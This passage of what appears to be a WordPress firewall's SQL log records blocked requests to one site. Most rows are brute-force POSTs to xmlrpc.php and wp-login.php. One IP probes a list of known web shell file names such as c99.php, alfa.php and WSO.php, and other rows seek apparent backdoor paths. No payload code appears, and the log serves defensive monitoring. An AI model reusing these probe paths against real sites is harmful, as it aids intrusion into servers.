Firefox\\/96\"}','qoLmJN0Pd2bY1puZ9feyAcTG',0,1665218971.5907,2408,'','POST',403,0,515,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','T7A5xEiaqlJZrF16By8RSz3C',0,1665218838.0466,17582,'','POST',403,0,600,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QshDTwdi8HV3jtZ7rUp05Enx',0,1665218639.8999,20349,'','POST',403,0,515,0,1,'',0),('194.233.66.131',3270066819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TzXD0WSN8a6yJ2xk7mqFLABj',0,1665218309.4253,18750,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kmNZx15D89rLtj36BETgeMHz',0,1665217996.1602,18722,'','POST',403,0,515,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','P3azGuVbinw8p7eZJX14DyUY',0,1665217383.1882,8807,'','POST',403,0,515,0,1,'',0),('217.138.252.123',3649764475,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w6f20HkVMyCYAutUFph83NeJ',0,1665217373.6204,18326,'','POST',403,0,515,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','7bTNkaq6zSidnPHYK5LQEBlV',0,1665217158.3822,2139,'','POST',403,0,600,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','H4VsE8GoP1fxyp9CkaWrKBIt',0,1665217091.6673,18525,'','POST',403,0,515,0,1,'',0),('217.138.195.19',3649749779,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','X0uc5BeAkjILTWwbts2fD6vP',0,1665216856.4646,5482,'','POST',403,0,515,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JjroPT5ROKunAYyVfEHgLwbX',0,1665216776.9652,7481,'','POST',403,0,515,0,1,'',0),('52.149.125.220',882212316,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','IVtjYk6Xax7MEDdR1mAvFsic',0,1665216758.8729,365,'','GET',403,0,700,0,1,'',0),('52.149.125.220',882212316,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jk9th6KS2FxZ4ilCNryImoUD',0,1665216743.9804,12149,'','GET',403,0,700,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mAjHCvGcpklzWtqb3Yd4a09r',0,1665216514.8633,19242,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tNV56iIS7HoDJG2QBYW914bp',0,1665249138.1812,300,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/date.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y3jf6Bq41KAdLeuRDXSTFItn',0,1665249137.0176,319,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MjxXmDeUACWbYif6lKdy1PGr',0,1665249134.3972,340,'','GET',403,0,700,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cmdPkvx5a8nHByjMLOIiFwXf',0,1665222987.6397,18792,'','POST',403,0,515,0,1,'',0),('37.120.132.91',628655195,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fpd0xgG1BOiJ2I8qwYsbzQMR',0,1665222026.1103,18702,'','POST',403,0,515,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Vx7n45pQSM1HBd2aiqyDRcwo',0,1665222207.8813,17331,'','POST',403,0,600,0,1,'',0),('185.45.66.25',3106751001,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oUew0WsaAMcPSFgGf1QKI5b2',0,1665221742.7784,18595,'','POST',403,0,515,0,1,'',0),('185.153.8.103',3113814119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CDQzLFeiJM5aSoqXfHP96cn8',0,1665221024.5305,18903,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RbeCdFAtMVsvmzgUNoqHS3Op',0,1665221404.9690,19691,'','POST',403,0,515,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','JU9YyDfA4xdpz71hml20WGIa',0,1665220526.4835,564,'','POST',403,0,600,0,1,'',0),('134.19.179.203',2249438155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','COKXMuV7H13yUtGYwnWSoR5d',0,1665220492.6117,18842,'','POST',403,0,515,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O7x1pXJuE6io9WD3VPjbIHCq',0,1665220311.2128,18782,'','POST',403,0,515,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yoKrQ6X9TwzSjiPYkhc8lBFC',0,1665219988.6914,18394,'','POST',403,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Aai71IbqZovrQujMKW9clHkO',0,1665249131.5907,390,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bUjz5eHW1ymkca6LGgCAhfMK',0,1665249125.2434,351,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CvNwVD6Mybj9xR5tWhgmnYFZ',0,1665249121.7120,333,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/blog/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2dfiaQhjYm6SFlrUVGvncetL',0,1665249120.0894,310,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IbvpNFuHrnATLce68GgzyE4w',0,1665249115.3980,311,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x5ucpmeQozhfd2sMLlHIvNKA',0,1665249110.8953,292,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JyEMFwp1lGTQt84LOKVAn3hz',0,1665249107.8269,291,'','GET',403,0,700,0,1,'',0),('217.138.252.123',3649764475,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','v3XNdxiozTjIg6au4hCtqVJ2',0,1665226733.5099,19131,'','POST',403,0,515,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Umw9IW2CuzDLe5jVKiMYgb0R',0,1665225585.3542,17460,'','POST',403,0,600,0,1,'',0),('185.156.175.35',3114053411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ECyr5QKJBzcZ9RunjFlU863I',0,1665224690.1857,18590,'','POST',403,0,515,0,1,'',0),('37.120.155.179',628661171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','S9FM6Q8o3tGCkjnTJgqxBhdK',0,1665224022.9446,2263,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','fHkj4SgPhu30nNQEvLUZGX5z',0,1665223892.4088,17738,'','POST',403,0,600,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HMAp1ES92GNFi3aL4WRYkVtg',0,1665249103.7490,309,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DBi3bQkxUHNOfvInL4Al91J8',0,1665249099.0690,380,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ziMEDu6JRy40lH2cgKrTh5LW',0,1665249094.8184,325,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','521xchSIR6JegwHanzM0qZP8',0,1665249089.1354,323,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GLf32uoMgFCEyvpd4mBk10Rq',0,1665249081.2725,292,'','GET',403,0,700,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','8MaqKpiGRcyrCxVNuL096T3J',0,1665230717.3162,11209,'','POST',403,0,600,0,1,'',0),('213.152.161.118',3583549814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zniUhdA4wWfMsKjEcoN7LRTD',0,1665230703.2342,14686,'','POST',403,0,515,0,1,'',0),('82.102.27.171',1382423467,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bhDqNo80aw61pxXP74sfSQ3J',0,1665230698.8677,19049,'','POST',403,0,515,0,1,'',0),('47.107.242.103',795603559,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','8K9DUeviHswB4F5APbo2MGNr',0,1665229001.1596,2019,'','POST',403,0,600,0,1,'',0),('198.98.50.19',3328324115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','BQY4oyrEmnhx5jfMlHsTvJwX',0,1665227548.0235,2290,'','POST',403,0,515,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','bAukm1XtCexoRFWOrI5EqlJj',0,1665227292.7784,18181,'','POST',403,0,600,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CTBN7Vu3bio8xJjGZQgXr4aM',0,1665249078.0794,295,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WMEfeBiJvRgb7VLDANI05zw8',0,1665249075.3652,305,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GTrOKPWYsIpeBxJHbAju9Mqz',0,1665249073.2156,372,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/Alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ps6WKvrgI4whxoXFnqY1NuAG',0,1665249069.8704,397,'','GET',403,0,700,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nVCLMI7Zz6OeEGw24dQ5fXpg',0,1665234114.8826,7686,'','POST',403,0,515,0,1,'',0),('216.137.176.23',3632902167,'','http://cteisys.com/wikindex.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 13_7 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.1.2 Mobile\\/15E148 Safari\\/604.1\"}','reHwA3ChGk4VxlU0tjY5S9Ec',0,1665234071.7161,11544,'','GET',403,0,700,0,1,'',0),('216.137.176.23',3632902167,'','http://cteisys.com/wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.1.2 Mobile\\/15E148 Safari\\/604.1\"}','upIj69CyDZdOBtP1vcmgVGRr',0,1665234071.6253,11634,'','GET',403,0,700,0,1,'',0),('216.137.176.23',3632902167,'','http://cteisys.com/class-wp-widget-archives.php','','{\"1\":\"Mozilla\\/5.0 (Linux; arm_64; Android 7.1.1; Lenovo TB-8504X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.127 YaBrowser\\/20.9.1.66.01 Safari\\/537.36\"}','ih2wIM7Q1EcbgvpSDfZKNkUo',0,1665234071.6851,11574,'','GET',403,0,700,0,1,'',0),('216.137.176.23',3632902167,'','http://cteisys.com/3index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','','{\"1\":\"Mozilla\\/5.0 (Android 10; Mobile; rv:68.0) Gecko\\/68.0 Firefox\\/68.0\"}','gREtnWIuDi78xcl3ydZ6CszT',0,1665234071.6881,11570,'','GET',403,0,700,0,1,'',0),('216.137.176.23',3632902167,'','http://cteisys.com/admin.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0.2 Mobile\\/15E148 Safari\\/604.1\"}','Au94ZrQb3TDKdBCRNFv75zO0',0,1665234071.6881,11562,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y38UlOGukanL5VqjyiTKP2Fs',0,1665249061.1747,295,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','04VHvXSA2eN1lWyDBKmU5IFY',0,1665249048.7092,11607,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PDCk3R7GmBzS8A0Kepl5nYsO',0,1665249046.1690,449,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mqiN1KhJYpWbA5UHfxyZGrS0',0,1665249039.7795,394,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2kDhMLPeysmQb3wfUCKBzqpi',0,1665249037.1351,305,'','GET',403,0,700,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4qo7ZrQnJOMVNjdh9icRfzPk',0,1665236261.6510,18226,'','POST',403,0,515,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','v75AroePm69ZQCROTJHkpWUj',0,1665235867.8013,565,'','POST',403,0,600,0,1,'',0),('116.255.178.218',1962914522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dnv7WXtAgE1sj6VfLuIReUp2',0,1665235865.3046,1825,'','POST',403,0,515,0,1,'',0),('62.102.148.158',1046910110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','p4UMqF9OBA8HGklTDi3xC6Zn',0,1665235496.4243,19149,'','POST',403,0,515,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','COnfGIWudD7bZN6qKHpQwoYL',0,1665234971.1507,18558,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zUSMhWX8aLiCBsEbf3RcOP7T',0,1665234541.3040,18556,'','POST',403,0,515,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','fuJ1kSYzljPrNwDGBvexd7yO',0,1665234153.9172,553,'','POST',403,0,600,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gT2RYKCacVpohMdBHF8qk1uU',0,1665249033.9932,453,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/01.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eDYHMNhfItrpVWRsqc3Q5vy8',0,1665248987.5803,316,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pJEF8ODBVUvuT6wcer3mRj17',0,1665248983.7700,328,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Lr3WTMPa9nRi6V1Es25ubQSD',0,1665248975.1024,344,'','GET',403,0,700,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','1fgxUuemhY4zbqsPrMwK6kT7',0,1665240235.7081,2506,'','POST',403,0,600,0,1,'',0),('199.249.230.17',3355043345,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MYfwgxeXdnPpToDLGv5qjAim',0,1665239274.2516,19067,'','POST',403,0,515,0,1,'',0),('39.108.148.88',661427288,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','xDhwzUdb6TNRm4cvGIq7riX9',0,1665238203.5859,7026,'','POST',403,0,600,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q6s3MVZbf2tXqBGlmHToENLn',0,1665248967.0551,325,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0eUFuHh2YrBRVEg5p1Z7AxmJ',0,1665248962.6953,342,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RXrQgCO6EW0pizP2wDdmxGUT',0,1665248959.8084,360,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EaPHzhoj5bmIrdK7VDZAgwTp',0,1665248958.3892,299,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 